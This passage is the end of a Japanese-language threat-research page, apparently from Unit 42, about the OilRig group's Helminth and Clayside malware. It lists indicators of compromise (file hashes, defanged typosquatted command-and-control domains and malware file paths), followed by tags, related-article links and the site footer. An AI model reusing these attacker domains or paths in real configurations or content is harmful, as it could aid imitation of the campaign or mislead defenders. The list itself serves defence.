C4FBC723981FC94884F0F493CB8711FDC9DA698980081D9B7C139FCFFBE723DA  
CFFC694ACE3E1547007AE00437536F2A88BA60179C51F23228E696FB02AFDC86  
0B9437DD87A3C24ED7D200F9B870D69F9B7AD918C51325C11444DF8BC6FB97BA  
903B6D948C16DC92B69FE1DE76CF64AB8377893770BF47C29BF91F3FD987F996  
8BFBB637FE72DA5C9AEE9857CA81FA54A5ABE7F2D1B061BC2A376943C63727C7  
9C0A33A5DC62933F17506F20E0258F877947BDCD15B091A597EAC05D299B7471  
93940B5E764F2F4A2D893BEBEF4BF1F7D63C4DB856877020A5852A6647CB04A0  
0EC288AC8C4AA045A45526C2939DBD843391C9C75FA4A3BCC0A6D7DC692FDCD1  
089BF971E8839DB818AC462F53F82DAED523C413BFC2E01FB76DD70B37162AFE  
D808F3109822C185F1D8E1BF7EF7781C219DC56F5906478651748F0ACE489D34  
3986D54B00647B507B2AFD708B7A1CE4C37027FB77D67C6BC3C20C3AC1A88CA4  
1B2FEE00D28782076178A63E669D2306C37BA0C417708D4DC1F751765C3F94E1  
662C53E69B66D62A4822E666031FD441BBDFA741E20D4511C6741EC3CB02475F  
F5A64DE9087B138608CCF036B067D91A47302259269FB05B3349964CA4060E7E  
A787C0E42608F9A69F718F6DCA5556607BE45EC77D17B07EB9EA1E0F7BB2E064  
4B5112F0FB64825B879B01D686E8F4D43521252A3B4F4026C9D1D76D3F15B281  
3AF6DFA4CEBD82F48B6638A9757730810707D79D961DDE1B72D3768E972E6184

#### **C2サーバ**

shalaghlagh\[.\]tk  
go0gIe\[.\]com  
winodwsupdates\[.\]me  
update-kernal\[.\]net  
googleupdate\[.\]download  
yahoooooomail\[.\]com  
upgradesystems\[.\]info

#### **ファイルのパス**

%PUBLIC%/Libraries/dn  
%PUBLIC%/Libraries/up  
%USERPROFILE%/AppData/Local/Microsoft/Media/up  
%USERPROFILE%/AppData/Local/Microsoft/Media/dn
トップに戻る

### タグ

* [Clayside](https://unit42.paloaltonetworks.com/ja/tag/clayside-ja/ "Clayside")
* [Helminth](https://unit42.paloaltonetworks.com/ja/tag/helminth-ja/ "Helminth")
* [OilRig](https://unit42.paloaltonetworks.com/ja/tag/oilrig-ja/ "OilRig")
* [OilRig attacks](https://unit42.paloaltonetworks.com/ja/tag/oilrig-attacks-ja/ "OilRig attacks")
* [Spear Phishing](https://unit42.paloaltonetworks.com/ja/tag/spear-phishing-ja/ "Spear Phishing")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:EITest攻撃の進化: Angler EKからNeutrinoそしてRigへ](https://unit42.paloaltonetworks.com/ja/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/ "EITest攻撃の進化: Angler EKからNeutrinoそしてRigへ")

### 目次

* 

### 関連記事

* [脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "article - table of contents")
* [イランによるサイバー脅威の進化：MBRワイパーからアイデンティティの兵器化まで](https://unit42.paloaltonetworks.com/ja/evolution-of-iran-cyber-threats/ "article - table of contents")
* [Unit 42 がウクライナのサイバー機関 SCPC SSSCIP と共同研究で Smoke Loader バックドアを暴く](https://unit42.paloaltonetworks.com/ja/unit-42-scpc-ssscip-uncover-smoke-loader-phishing/ "article - table of contents")

## 関連項目 マルウェア リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")  
  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月2日 [#### Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer](https://unit42.paloaltonetworks.com/ja/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/ja/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/ja/tag/python-ja/ "Python")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/vvs-stealer/ "Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
